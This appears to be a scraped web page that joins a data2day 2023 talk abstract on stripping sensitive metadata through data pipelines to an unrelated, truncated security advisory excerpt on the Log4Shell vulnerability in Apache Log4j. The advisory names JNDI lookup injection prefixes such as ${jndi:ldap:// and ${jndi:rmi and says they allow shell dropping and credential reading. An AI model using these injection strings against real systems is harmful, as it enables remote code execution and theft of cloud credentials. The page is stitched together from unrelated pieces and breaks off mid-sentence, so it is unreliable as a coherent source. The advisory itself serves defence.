data2day 2023

Die Konferenz für Data Scientists,
Data Engineers und Data Teams

11. und 12. Oktober 2023, Karlsruhe
Watch our team performing live on stage

Integrating Data-Privacy Through Pipelines

Integrating Data-Privacy Through Pipelines

All data stored on a filesystem has some metadata. Sometimes more and other times less. This can be a huge privacy breach, since the metadata can contain sensible data that can be used to identify persons, locations, or other interesting information.
To not leak any hidden sensitive information, it is crucial to ensure that all data that is stored and processed is clean. This task is predestined to automate.

This talk will focus on how to remove all the metadata and automate this procedure through data processing pipelines that can be used in an MLOps as well as the classical DevOps cycle.

Previous knowledge

  • Fundamental Machine Learning and Data Science terms and practices

Learning objectives

  • Automation of removal of (sensitive) metadata in a wide variety of areas



Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.


Versions 1.x, which are no longer maintained, have a similar vulnerability.


A zero-day remote code execution
vulnerability has been discovered, allowing attackers to take complete
control of systems without authentication.
The vulnerability was publicly disclosed via GitHub on 9.12.2021.

According to the current status, the vulnerability has been exploited first on 01.12.2021, but mass attacks only became known with the release on 9.12.2021.


The Log4j log output enables the inclusion of a wide field of possible variables. This cannot only be used internally from a system perspective but also from any remote location. Attackers can call external Java libraries via e.g. ${jdni:ldap:// or ${jndi:ldaps://, which opens the possibility to perform shell dropping without much additional effort. In addition, attackers can use ${jndi:rmi to execute commands directly within the current environment.
For any cloud service, the Log4j log output could be used to read credentials – such as access tokens – potentially allowing wide-ranging access to cloud services. The following guide contains ndaal‘s expert information, and measures to handle the ongoing Log4Shell cybersecurity incident and attack wave caused by a critical vulnerability in the Apache Log4j logging library v2.x.

The document will be updated frequently and is available here: